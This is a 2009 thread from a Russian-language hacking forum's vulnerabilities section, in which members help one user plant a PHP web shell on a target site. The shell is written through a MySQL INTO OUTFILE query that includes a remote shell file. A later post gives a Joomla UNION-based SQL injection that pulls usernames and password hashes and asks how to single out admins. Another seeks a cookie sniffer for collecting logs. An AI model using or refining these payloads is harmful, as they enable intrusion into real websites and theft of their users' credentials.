Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. preda1or

    preda1or Member

    Joined:
    27 Oct 2008
    Messages:
    167
    Likes Received:
    96
    Reputations:
    6
    а почему ты думаешь что mysql на той же машине находится?)
     
  2. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    preda1or, a как проверить? на той или нет?
    Об этом если честно чего-то не подумал.
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    (Errcode: 2) - папка не существует.
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну правильно, чо это за пусть такой, ты же не "../etc/passwd" подбираешь, тут надо писать реальный абсолютный путь к папке с правами на запись
     
  5. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    to R1dex, странно вроде есть такая :) Попробую еще...
    to Pashkela, да я полный пишу, просто скрыл путь, что бы не палиццо :) (поправил верхний пост)

    Еще вопрос, полный путь у меня такой:

    /var/www/vhosts/название сайта/httpdocs/

    то есть в INTO OUTFILE так и пишем

    /var/www/vhosts/название сайта/httpdocs/images/shell.php

    при условии, что папка images имеет нужные нам права.

    ?
     
    #4705 Octave_Parango, 19 Jan 2009
    Last edited: 19 Jan 2009
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Octave_Parango Запрос покажи полностью. Права есть? Вообще ошибка , как уже сказал R1dex, говорит об несуществующей дирректории. Именно путь, а не права, или что то ещё, но запрос давай посмотрим на всякий случай :)
     
  7. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    to jokester,

    запрос такой:

    CREATE TABLE `she` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `she` ( `shl` ) VALUES ('<?php include("http://название сайте/shell.txt") ?>'); SELECT `shl` FROM `she` INTO OUTFILE `/var/www/vhosts/название сайта/httpdocs/images/shell.php`; DROP TABLE `she`

    Где-то накосячил? Да?
     
  8. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Запрос вроде нормальный... Смотри права...
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Вряд ли в этой папке "httpdocs" есть права на запись, скорее всего там .htaccess вообще стоит
     
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    .htaccess ни имеет никакого отношения.

    По возврашаемому коду ошибки ясно что такой диры нет, что бы убедиться в этом попробуй LOAD_FILE какой нибудь файл из этой директории.
    Кстати у тебя file_priv есть?
     
    #4710 AkyHa_MaTaTa, 19 Jan 2009
    Last edited: 19 Jan 2009
  11. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Octave_Parango
    .htaccess подгрузи да и разберись, так ли оно, как Pashkela сказал...

    2 AkyHa_MaTaTa
    имхо, не факт, могут всякие извращения стоять...
     
  12. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Не вижу никакой связи между .htaccess и работой с локальной файловой системой посредством MySQL, если только что разве проверить есть ли такая дириктория посредством загрузки .htaccess из той дириктории, хотя в большинстве случаев именно к .htaccess у MySQL узера нет прав на доступ, легчше подгрузить какую нибудь картинку из /images/.
     
    1 person likes this.
  13. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    file_priv - есть.
    из images - все читается...
    Может с путем я че-то накосячил?
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Да, судя по ошибке, ты накосячил именно с путём. Нету такой диры
     
  15. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Если читается, но не пишется - резонно предположить, что каталог не доступен для записи из под того юзера под кем работает процесс mysql.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Не думаю, при таком раскладе помоему будет выкидывать Errcode: 13 , а у него Errcode: 2, а это несуществующая дира, элементарный косяк в написании пути даст такую-же ошибку

    Octave_Parango
    Чтение ты как осуществлял?
     
    #4716 Kakoytoxaker, 19 Jan 2009
    Last edited: 19 Jan 2009
  17. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 AkyHa_MaTaTa
    ты прав, я просто на первоначальный вопрос внимания не обратил...
    думал мало ли, вдруг он записанные файлы через веб хотел просмотреть...
     
  18. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    У меня маленький вопрос по joomla, как узнать какие узеры являються админами, то есть например я выбераю узеров
    -1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3A,username,password),10,11,12,13,14+from+jos_users+limit+3,1/*
    как узнать какие из них админы, по +where+gid=25 ?
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Если не ошибаюсь gid=25 и gid=24 . Так-же можешь посмотреть поле usertype
     
  20. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Подскажите плз рабочий онлайн сниффер, раньше юзал na-s.ru но сейчас там чтото странное на сайте творится. Нужен сниффер с авторизацией, чтобы кто попало не видел мои логи...
     
Thread Status:
Not open for further replies.